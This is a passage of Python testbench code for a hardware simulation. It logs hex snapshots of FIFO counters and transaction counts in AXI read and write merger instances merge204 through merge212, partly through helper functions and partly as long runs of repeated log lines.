logs.log_info("SNP %x tb.dut.merge204.axi_rd_4_merger.b_ar_fifo.count" % logs.peek("tb.dut.merge204.axi_rd_4_merger.b_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge204.axi_rd_4_merger.b_ar_fifo.int_count" % logs.peek("tb.dut.merge204.axi_rd_4_merger.b_ar_fifo.int_count"))
def _snap(path):
    # Log one "SNP <hex value> <signal path>" snapshot line for the signal.
    logs.log_info("SNP %x %s" % (logs.peek(path), path))

def _snap_rd_merger(base, chans="abcd", rcounts=True):
    # Read-merger counters: per-channel rcount, then per-channel AR and ID
    # FIFO counters, in channel order a..d.
    if rcounts:
        for ch in "abcd":
            _snap("%s.%s_rcount" % (base, ch))
    for ch in chans:
        _snap("%s.%s_ar_fifo.count" % (base, ch))
        _snap("%s.%s_ar_fifo.int_count" % (base, ch))
        _snap("%s.%s_ids_fifo.next_count" % (base, ch))
        _snap("%s.%s_ids_fifo.count" % (base, ch))

def _snap_wr_merger(base):
    # Write-merger counters: panic counts and bcounts per channel, then
    # per-channel AW, B and WIN FIFO counters; only channel b has the
    # additional out_fifo counters.
    for ch in "abcd":
        _snap("%s.panic_%scount" % (base, ch))
    for ch in "abcd":
        _snap("%s.%s_bcount" % (base, ch))
    for ch in "abcd":
        _snap("%s.%s_aw_fifo.count" % (base, ch))
        _snap("%s.%s_aw_fifo.int_count" % (base, ch))
        _snap("%s.%s_b_fifo.next_count" % (base, ch))
        _snap("%s.%s_b_fifo.count" % (base, ch))
        if ch == "b":
            _snap("%s.b_out_fifo.next_count" % base)
            _snap("%s.b_out_fifo.count" % base)
        _snap("%s.%s_win_fifo.count" % (base, ch))
        _snap("%s.%s_win_fifo.int_count" % (base, ch))

# Tail of merge204's read merger (channel b ID FIFO, then channels c and d),
# followed by its full write merger.
_snap("tb.dut.merge204.axi_rd_4_merger.b_ids_fifo.next_count")
_snap("tb.dut.merge204.axi_rd_4_merger.b_ids_fifo.count")
_snap_rd_merger("tb.dut.merge204.axi_rd_4_merger", chans="cd", rcounts=False)
_snap_wr_merger("tb.dut.merge204.axi_wr_4_merger")

# Complete read- and write-merger snapshots for merge205..merge208.
for _idx in range(205, 209):
    _snap_rd_merger("tb.dut.merge%d.axi_rd_4_merger" % _idx)
    _snap_wr_merger("tb.dut.merge%d.axi_wr_4_merger" % _idx)

# Head of merge209's read merger: the four rcounts and the first AR FIFO
# counter of channel a.
_snap_rd_merger("tb.dut.merge209.axi_rd_4_merger", chans="")
_snap("tb.dut.merge209.axi_rd_4_merger.a_ar_fifo.count")
logs.log_info("SNP %x tb.dut.merge209.axi_rd_4_merger.a_ar_fifo.int_count" % logs.peek("tb.dut.merge209.axi_rd_4_merger.a_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge209.axi_rd_4_merger.a_ids_fifo.next_count" % logs.peek("tb.dut.merge209.axi_rd_4_merger.a_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge209.axi_rd_4_merger.a_ids_fifo.count" % logs.peek("tb.dut.merge209.axi_rd_4_merger.a_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge209.axi_rd_4_merger.b_ar_fifo.count" % logs.peek("tb.dut.merge209.axi_rd_4_merger.b_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge209.axi_rd_4_merger.b_ar_fifo.int_count" % logs.peek("tb.dut.merge209.axi_rd_4_merger.b_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge209.axi_rd_4_merger.b_ids_fifo.next_count" % logs.peek("tb.dut.merge209.axi_rd_4_merger.b_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge209.axi_rd_4_merger.b_ids_fifo.count" % logs.peek("tb.dut.merge209.axi_rd_4_merger.b_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge209.axi_rd_4_merger.c_ar_fifo.count" % logs.peek("tb.dut.merge209.axi_rd_4_merger.c_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge209.axi_rd_4_merger.c_ar_fifo.int_count" % logs.peek("tb.dut.merge209.axi_rd_4_merger.c_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge209.axi_rd_4_merger.c_ids_fifo.next_count" % logs.peek("tb.dut.merge209.axi_rd_4_merger.c_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge209.axi_rd_4_merger.c_ids_fifo.count" % logs.peek("tb.dut.merge209.axi_rd_4_merger.c_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge209.axi_rd_4_merger.d_ar_fifo.count" % logs.peek("tb.dut.merge209.axi_rd_4_merger.d_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge209.axi_rd_4_merger.d_ar_fifo.int_count" % logs.peek("tb.dut.merge209.axi_rd_4_merger.d_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge209.axi_rd_4_merger.d_ids_fifo.next_count" % logs.peek("tb.dut.merge209.axi_rd_4_merger.d_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge209.axi_rd_4_merger.d_ids_fifo.count" % logs.peek("tb.dut.merge209.axi_rd_4_merger.d_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge209.axi_wr_4_merger.panic_acount" % logs.peek("tb.dut.merge209.axi_wr_4_merger.panic_acount"))
logs.log_info("SNP %x tb.dut.merge209.axi_wr_4_merger.panic_bcount" % logs.peek("tb.dut.merge209.axi_wr_4_merger.panic_bcount"))
logs.log_info("SNP %x tb.dut.merge209.axi_wr_4_merger.panic_ccount" % logs.peek("tb.dut.merge209.axi_wr_4_merger.panic_ccount"))
logs.log_info("SNP %x tb.dut.merge209.axi_wr_4_merger.panic_dcount" % logs.peek("tb.dut.merge209.axi_wr_4_merger.panic_dcount"))
logs.log_info("SNP %x tb.dut.merge209.axi_wr_4_merger.a_bcount" % logs.peek("tb.dut.merge209.axi_wr_4_merger.a_bcount"))
logs.log_info("SNP %x tb.dut.merge209.axi_wr_4_merger.b_bcount" % logs.peek("tb.dut.merge209.axi_wr_4_merger.b_bcount"))
logs.log_info("SNP %x tb.dut.merge209.axi_wr_4_merger.c_bcount" % logs.peek("tb.dut.merge209.axi_wr_4_merger.c_bcount"))
logs.log_info("SNP %x tb.dut.merge209.axi_wr_4_merger.d_bcount" % logs.peek("tb.dut.merge209.axi_wr_4_merger.d_bcount"))
logs.log_info("SNP %x tb.dut.merge209.axi_wr_4_merger.a_aw_fifo.count" % logs.peek("tb.dut.merge209.axi_wr_4_merger.a_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge209.axi_wr_4_merger.a_aw_fifo.int_count" % logs.peek("tb.dut.merge209.axi_wr_4_merger.a_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge209.axi_wr_4_merger.a_b_fifo.next_count" % logs.peek("tb.dut.merge209.axi_wr_4_merger.a_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge209.axi_wr_4_merger.a_b_fifo.count" % logs.peek("tb.dut.merge209.axi_wr_4_merger.a_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge209.axi_wr_4_merger.a_win_fifo.count" % logs.peek("tb.dut.merge209.axi_wr_4_merger.a_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge209.axi_wr_4_merger.a_win_fifo.int_count" % logs.peek("tb.dut.merge209.axi_wr_4_merger.a_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge209.axi_wr_4_merger.b_aw_fifo.count" % logs.peek("tb.dut.merge209.axi_wr_4_merger.b_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge209.axi_wr_4_merger.b_aw_fifo.int_count" % logs.peek("tb.dut.merge209.axi_wr_4_merger.b_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge209.axi_wr_4_merger.b_b_fifo.next_count" % logs.peek("tb.dut.merge209.axi_wr_4_merger.b_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge209.axi_wr_4_merger.b_b_fifo.count" % logs.peek("tb.dut.merge209.axi_wr_4_merger.b_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge209.axi_wr_4_merger.b_out_fifo.next_count" % logs.peek("tb.dut.merge209.axi_wr_4_merger.b_out_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge209.axi_wr_4_merger.b_out_fifo.count" % logs.peek("tb.dut.merge209.axi_wr_4_merger.b_out_fifo.count"))
logs.log_info("SNP %x tb.dut.merge209.axi_wr_4_merger.b_win_fifo.count" % logs.peek("tb.dut.merge209.axi_wr_4_merger.b_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge209.axi_wr_4_merger.b_win_fifo.int_count" % logs.peek("tb.dut.merge209.axi_wr_4_merger.b_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge209.axi_wr_4_merger.c_aw_fifo.count" % logs.peek("tb.dut.merge209.axi_wr_4_merger.c_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge209.axi_wr_4_merger.c_aw_fifo.int_count" % logs.peek("tb.dut.merge209.axi_wr_4_merger.c_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge209.axi_wr_4_merger.c_b_fifo.next_count" % logs.peek("tb.dut.merge209.axi_wr_4_merger.c_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge209.axi_wr_4_merger.c_b_fifo.count" % logs.peek("tb.dut.merge209.axi_wr_4_merger.c_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge209.axi_wr_4_merger.c_win_fifo.count" % logs.peek("tb.dut.merge209.axi_wr_4_merger.c_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge209.axi_wr_4_merger.c_win_fifo.int_count" % logs.peek("tb.dut.merge209.axi_wr_4_merger.c_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge209.axi_wr_4_merger.d_aw_fifo.count" % logs.peek("tb.dut.merge209.axi_wr_4_merger.d_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge209.axi_wr_4_merger.d_aw_fifo.int_count" % logs.peek("tb.dut.merge209.axi_wr_4_merger.d_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge209.axi_wr_4_merger.d_b_fifo.next_count" % logs.peek("tb.dut.merge209.axi_wr_4_merger.d_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge209.axi_wr_4_merger.d_b_fifo.count" % logs.peek("tb.dut.merge209.axi_wr_4_merger.d_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge209.axi_wr_4_merger.d_win_fifo.count" % logs.peek("tb.dut.merge209.axi_wr_4_merger.d_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge209.axi_wr_4_merger.d_win_fifo.int_count" % logs.peek("tb.dut.merge209.axi_wr_4_merger.d_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge210.axi_rd_4_merger.a_rcount" % logs.peek("tb.dut.merge210.axi_rd_4_merger.a_rcount"))
logs.log_info("SNP %x tb.dut.merge210.axi_rd_4_merger.b_rcount" % logs.peek("tb.dut.merge210.axi_rd_4_merger.b_rcount"))
logs.log_info("SNP %x tb.dut.merge210.axi_rd_4_merger.c_rcount" % logs.peek("tb.dut.merge210.axi_rd_4_merger.c_rcount"))
logs.log_info("SNP %x tb.dut.merge210.axi_rd_4_merger.d_rcount" % logs.peek("tb.dut.merge210.axi_rd_4_merger.d_rcount"))
logs.log_info("SNP %x tb.dut.merge210.axi_rd_4_merger.a_ar_fifo.count" % logs.peek("tb.dut.merge210.axi_rd_4_merger.a_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge210.axi_rd_4_merger.a_ar_fifo.int_count" % logs.peek("tb.dut.merge210.axi_rd_4_merger.a_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge210.axi_rd_4_merger.a_ids_fifo.next_count" % logs.peek("tb.dut.merge210.axi_rd_4_merger.a_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge210.axi_rd_4_merger.a_ids_fifo.count" % logs.peek("tb.dut.merge210.axi_rd_4_merger.a_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge210.axi_rd_4_merger.b_ar_fifo.count" % logs.peek("tb.dut.merge210.axi_rd_4_merger.b_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge210.axi_rd_4_merger.b_ar_fifo.int_count" % logs.peek("tb.dut.merge210.axi_rd_4_merger.b_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge210.axi_rd_4_merger.b_ids_fifo.next_count" % logs.peek("tb.dut.merge210.axi_rd_4_merger.b_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge210.axi_rd_4_merger.b_ids_fifo.count" % logs.peek("tb.dut.merge210.axi_rd_4_merger.b_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge210.axi_rd_4_merger.c_ar_fifo.count" % logs.peek("tb.dut.merge210.axi_rd_4_merger.c_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge210.axi_rd_4_merger.c_ar_fifo.int_count" % logs.peek("tb.dut.merge210.axi_rd_4_merger.c_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge210.axi_rd_4_merger.c_ids_fifo.next_count" % logs.peek("tb.dut.merge210.axi_rd_4_merger.c_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge210.axi_rd_4_merger.c_ids_fifo.count" % logs.peek("tb.dut.merge210.axi_rd_4_merger.c_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge210.axi_rd_4_merger.d_ar_fifo.count" % logs.peek("tb.dut.merge210.axi_rd_4_merger.d_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge210.axi_rd_4_merger.d_ar_fifo.int_count" % logs.peek("tb.dut.merge210.axi_rd_4_merger.d_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge210.axi_rd_4_merger.d_ids_fifo.next_count" % logs.peek("tb.dut.merge210.axi_rd_4_merger.d_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge210.axi_rd_4_merger.d_ids_fifo.count" % logs.peek("tb.dut.merge210.axi_rd_4_merger.d_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge210.axi_wr_4_merger.panic_acount" % logs.peek("tb.dut.merge210.axi_wr_4_merger.panic_acount"))
logs.log_info("SNP %x tb.dut.merge210.axi_wr_4_merger.panic_bcount" % logs.peek("tb.dut.merge210.axi_wr_4_merger.panic_bcount"))
logs.log_info("SNP %x tb.dut.merge210.axi_wr_4_merger.panic_ccount" % logs.peek("tb.dut.merge210.axi_wr_4_merger.panic_ccount"))
logs.log_info("SNP %x tb.dut.merge210.axi_wr_4_merger.panic_dcount" % logs.peek("tb.dut.merge210.axi_wr_4_merger.panic_dcount"))
logs.log_info("SNP %x tb.dut.merge210.axi_wr_4_merger.a_bcount" % logs.peek("tb.dut.merge210.axi_wr_4_merger.a_bcount"))
logs.log_info("SNP %x tb.dut.merge210.axi_wr_4_merger.b_bcount" % logs.peek("tb.dut.merge210.axi_wr_4_merger.b_bcount"))
logs.log_info("SNP %x tb.dut.merge210.axi_wr_4_merger.c_bcount" % logs.peek("tb.dut.merge210.axi_wr_4_merger.c_bcount"))
logs.log_info("SNP %x tb.dut.merge210.axi_wr_4_merger.d_bcount" % logs.peek("tb.dut.merge210.axi_wr_4_merger.d_bcount"))
logs.log_info("SNP %x tb.dut.merge210.axi_wr_4_merger.a_aw_fifo.count" % logs.peek("tb.dut.merge210.axi_wr_4_merger.a_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge210.axi_wr_4_merger.a_aw_fifo.int_count" % logs.peek("tb.dut.merge210.axi_wr_4_merger.a_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge210.axi_wr_4_merger.a_b_fifo.next_count" % logs.peek("tb.dut.merge210.axi_wr_4_merger.a_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge210.axi_wr_4_merger.a_b_fifo.count" % logs.peek("tb.dut.merge210.axi_wr_4_merger.a_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge210.axi_wr_4_merger.a_win_fifo.count" % logs.peek("tb.dut.merge210.axi_wr_4_merger.a_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge210.axi_wr_4_merger.a_win_fifo.int_count" % logs.peek("tb.dut.merge210.axi_wr_4_merger.a_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge210.axi_wr_4_merger.b_aw_fifo.count" % logs.peek("tb.dut.merge210.axi_wr_4_merger.b_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge210.axi_wr_4_merger.b_aw_fifo.int_count" % logs.peek("tb.dut.merge210.axi_wr_4_merger.b_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge210.axi_wr_4_merger.b_b_fifo.next_count" % logs.peek("tb.dut.merge210.axi_wr_4_merger.b_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge210.axi_wr_4_merger.b_b_fifo.count" % logs.peek("tb.dut.merge210.axi_wr_4_merger.b_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge210.axi_wr_4_merger.b_out_fifo.next_count" % logs.peek("tb.dut.merge210.axi_wr_4_merger.b_out_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge210.axi_wr_4_merger.b_out_fifo.count" % logs.peek("tb.dut.merge210.axi_wr_4_merger.b_out_fifo.count"))
logs.log_info("SNP %x tb.dut.merge210.axi_wr_4_merger.b_win_fifo.count" % logs.peek("tb.dut.merge210.axi_wr_4_merger.b_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge210.axi_wr_4_merger.b_win_fifo.int_count" % logs.peek("tb.dut.merge210.axi_wr_4_merger.b_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge210.axi_wr_4_merger.c_aw_fifo.count" % logs.peek("tb.dut.merge210.axi_wr_4_merger.c_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge210.axi_wr_4_merger.c_aw_fifo.int_count" % logs.peek("tb.dut.merge210.axi_wr_4_merger.c_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge210.axi_wr_4_merger.c_b_fifo.next_count" % logs.peek("tb.dut.merge210.axi_wr_4_merger.c_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge210.axi_wr_4_merger.c_b_fifo.count" % logs.peek("tb.dut.merge210.axi_wr_4_merger.c_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge210.axi_wr_4_merger.c_win_fifo.count" % logs.peek("tb.dut.merge210.axi_wr_4_merger.c_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge210.axi_wr_4_merger.c_win_fifo.int_count" % logs.peek("tb.dut.merge210.axi_wr_4_merger.c_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge210.axi_wr_4_merger.d_aw_fifo.count" % logs.peek("tb.dut.merge210.axi_wr_4_merger.d_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge210.axi_wr_4_merger.d_aw_fifo.int_count" % logs.peek("tb.dut.merge210.axi_wr_4_merger.d_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge210.axi_wr_4_merger.d_b_fifo.next_count" % logs.peek("tb.dut.merge210.axi_wr_4_merger.d_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge210.axi_wr_4_merger.d_b_fifo.count" % logs.peek("tb.dut.merge210.axi_wr_4_merger.d_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge210.axi_wr_4_merger.d_win_fifo.count" % logs.peek("tb.dut.merge210.axi_wr_4_merger.d_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge210.axi_wr_4_merger.d_win_fifo.int_count" % logs.peek("tb.dut.merge210.axi_wr_4_merger.d_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge211.axi_rd_4_merger.a_rcount" % logs.peek("tb.dut.merge211.axi_rd_4_merger.a_rcount"))
logs.log_info("SNP %x tb.dut.merge211.axi_rd_4_merger.b_rcount" % logs.peek("tb.dut.merge211.axi_rd_4_merger.b_rcount"))
logs.log_info("SNP %x tb.dut.merge211.axi_rd_4_merger.c_rcount" % logs.peek("tb.dut.merge211.axi_rd_4_merger.c_rcount"))
logs.log_info("SNP %x tb.dut.merge211.axi_rd_4_merger.d_rcount" % logs.peek("tb.dut.merge211.axi_rd_4_merger.d_rcount"))
logs.log_info("SNP %x tb.dut.merge211.axi_rd_4_merger.a_ar_fifo.count" % logs.peek("tb.dut.merge211.axi_rd_4_merger.a_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge211.axi_rd_4_merger.a_ar_fifo.int_count" % logs.peek("tb.dut.merge211.axi_rd_4_merger.a_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge211.axi_rd_4_merger.a_ids_fifo.next_count" % logs.peek("tb.dut.merge211.axi_rd_4_merger.a_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge211.axi_rd_4_merger.a_ids_fifo.count" % logs.peek("tb.dut.merge211.axi_rd_4_merger.a_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge211.axi_rd_4_merger.b_ar_fifo.count" % logs.peek("tb.dut.merge211.axi_rd_4_merger.b_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge211.axi_rd_4_merger.b_ar_fifo.int_count" % logs.peek("tb.dut.merge211.axi_rd_4_merger.b_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge211.axi_rd_4_merger.b_ids_fifo.next_count" % logs.peek("tb.dut.merge211.axi_rd_4_merger.b_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge211.axi_rd_4_merger.b_ids_fifo.count" % logs.peek("tb.dut.merge211.axi_rd_4_merger.b_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge211.axi_rd_4_merger.c_ar_fifo.count" % logs.peek("tb.dut.merge211.axi_rd_4_merger.c_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge211.axi_rd_4_merger.c_ar_fifo.int_count" % logs.peek("tb.dut.merge211.axi_rd_4_merger.c_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge211.axi_rd_4_merger.c_ids_fifo.next_count" % logs.peek("tb.dut.merge211.axi_rd_4_merger.c_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge211.axi_rd_4_merger.c_ids_fifo.count" % logs.peek("tb.dut.merge211.axi_rd_4_merger.c_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge211.axi_rd_4_merger.d_ar_fifo.count" % logs.peek("tb.dut.merge211.axi_rd_4_merger.d_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge211.axi_rd_4_merger.d_ar_fifo.int_count" % logs.peek("tb.dut.merge211.axi_rd_4_merger.d_ar_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge211.axi_rd_4_merger.d_ids_fifo.next_count" % logs.peek("tb.dut.merge211.axi_rd_4_merger.d_ids_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge211.axi_rd_4_merger.d_ids_fifo.count" % logs.peek("tb.dut.merge211.axi_rd_4_merger.d_ids_fifo.count"))
logs.log_info("SNP %x tb.dut.merge211.axi_wr_4_merger.panic_acount" % logs.peek("tb.dut.merge211.axi_wr_4_merger.panic_acount"))
logs.log_info("SNP %x tb.dut.merge211.axi_wr_4_merger.panic_bcount" % logs.peek("tb.dut.merge211.axi_wr_4_merger.panic_bcount"))
logs.log_info("SNP %x tb.dut.merge211.axi_wr_4_merger.panic_ccount" % logs.peek("tb.dut.merge211.axi_wr_4_merger.panic_ccount"))
logs.log_info("SNP %x tb.dut.merge211.axi_wr_4_merger.panic_dcount" % logs.peek("tb.dut.merge211.axi_wr_4_merger.panic_dcount"))
logs.log_info("SNP %x tb.dut.merge211.axi_wr_4_merger.a_bcount" % logs.peek("tb.dut.merge211.axi_wr_4_merger.a_bcount"))
logs.log_info("SNP %x tb.dut.merge211.axi_wr_4_merger.b_bcount" % logs.peek("tb.dut.merge211.axi_wr_4_merger.b_bcount"))
logs.log_info("SNP %x tb.dut.merge211.axi_wr_4_merger.c_bcount" % logs.peek("tb.dut.merge211.axi_wr_4_merger.c_bcount"))
logs.log_info("SNP %x tb.dut.merge211.axi_wr_4_merger.d_bcount" % logs.peek("tb.dut.merge211.axi_wr_4_merger.d_bcount"))
logs.log_info("SNP %x tb.dut.merge211.axi_wr_4_merger.a_aw_fifo.count" % logs.peek("tb.dut.merge211.axi_wr_4_merger.a_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge211.axi_wr_4_merger.a_aw_fifo.int_count" % logs.peek("tb.dut.merge211.axi_wr_4_merger.a_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge211.axi_wr_4_merger.a_b_fifo.next_count" % logs.peek("tb.dut.merge211.axi_wr_4_merger.a_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge211.axi_wr_4_merger.a_b_fifo.count" % logs.peek("tb.dut.merge211.axi_wr_4_merger.a_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge211.axi_wr_4_merger.a_win_fifo.count" % logs.peek("tb.dut.merge211.axi_wr_4_merger.a_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge211.axi_wr_4_merger.a_win_fifo.int_count" % logs.peek("tb.dut.merge211.axi_wr_4_merger.a_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge211.axi_wr_4_merger.b_aw_fifo.count" % logs.peek("tb.dut.merge211.axi_wr_4_merger.b_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge211.axi_wr_4_merger.b_aw_fifo.int_count" % logs.peek("tb.dut.merge211.axi_wr_4_merger.b_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge211.axi_wr_4_merger.b_b_fifo.next_count" % logs.peek("tb.dut.merge211.axi_wr_4_merger.b_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge211.axi_wr_4_merger.b_b_fifo.count" % logs.peek("tb.dut.merge211.axi_wr_4_merger.b_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge211.axi_wr_4_merger.b_out_fifo.next_count" % logs.peek("tb.dut.merge211.axi_wr_4_merger.b_out_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge211.axi_wr_4_merger.b_out_fifo.count" % logs.peek("tb.dut.merge211.axi_wr_4_merger.b_out_fifo.count"))
logs.log_info("SNP %x tb.dut.merge211.axi_wr_4_merger.b_win_fifo.count" % logs.peek("tb.dut.merge211.axi_wr_4_merger.b_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge211.axi_wr_4_merger.b_win_fifo.int_count" % logs.peek("tb.dut.merge211.axi_wr_4_merger.b_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge211.axi_wr_4_merger.c_aw_fifo.count" % logs.peek("tb.dut.merge211.axi_wr_4_merger.c_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge211.axi_wr_4_merger.c_aw_fifo.int_count" % logs.peek("tb.dut.merge211.axi_wr_4_merger.c_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge211.axi_wr_4_merger.c_b_fifo.next_count" % logs.peek("tb.dut.merge211.axi_wr_4_merger.c_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge211.axi_wr_4_merger.c_b_fifo.count" % logs.peek("tb.dut.merge211.axi_wr_4_merger.c_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge211.axi_wr_4_merger.c_win_fifo.count" % logs.peek("tb.dut.merge211.axi_wr_4_merger.c_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge211.axi_wr_4_merger.c_win_fifo.int_count" % logs.peek("tb.dut.merge211.axi_wr_4_merger.c_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge211.axi_wr_4_merger.d_aw_fifo.count" % logs.peek("tb.dut.merge211.axi_wr_4_merger.d_aw_fifo.count"))
logs.log_info("SNP %x tb.dut.merge211.axi_wr_4_merger.d_aw_fifo.int_count" % logs.peek("tb.dut.merge211.axi_wr_4_merger.d_aw_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge211.axi_wr_4_merger.d_b_fifo.next_count" % logs.peek("tb.dut.merge211.axi_wr_4_merger.d_b_fifo.next_count"))
logs.log_info("SNP %x tb.dut.merge211.axi_wr_4_merger.d_b_fifo.count" % logs.peek("tb.dut.merge211.axi_wr_4_merger.d_b_fifo.count"))
logs.log_info("SNP %x tb.dut.merge211.axi_wr_4_merger.d_win_fifo.count" % logs.peek("tb.dut.merge211.axi_wr_4_merger.d_win_fifo.count"))
logs.log_info("SNP %x tb.dut.merge211.axi_wr_4_merger.d_win_fifo.int_count" % logs.peek("tb.dut.merge211.axi_wr_4_merger.d_win_fifo.int_count"))
logs.log_info("SNP %x tb.dut.merge212.axi_rd_4_merger.a_rcount" % logs.peek("tb.dut.merge212.axi_rd_4_merger.a_rcount"))
logs.log_info("SNP %x tb.dut.merge212.axi_rd_4_merger.b_rcount" % logs.peek("tb.dut.merge212.axi_rd_4_merger.b_rcount"))
logs.log_info("SNP %x tb.dut.merge212.axi_rd_4_merger.c_rcount" % logs.peek("tb.dut.merge212.axi_rd_4_merger.c_rcount"))
logs.log_info("SNP %x tb.dut.merge212.axi_rd_4_merger.d_rcount" % logs.peek("tb.dut.merge212.axi_rd_4_merger.d_rcount"))
logs.log_info("SNP %x tb.dut.merge212.axi_rd_4_merger.a_ar_fifo.count" % logs.peek("tb.dut.merge212.axi_rd_4_merger.a_ar_fifo.count"))
logs.log_info("SNP %x tb.dut.merge212.axi_rd_4_merger.a_ar_fifo.int_count" % logs.peek("tb.dut.merge212.axi_rd_4_merger.a_ar_fifo.int_count"))
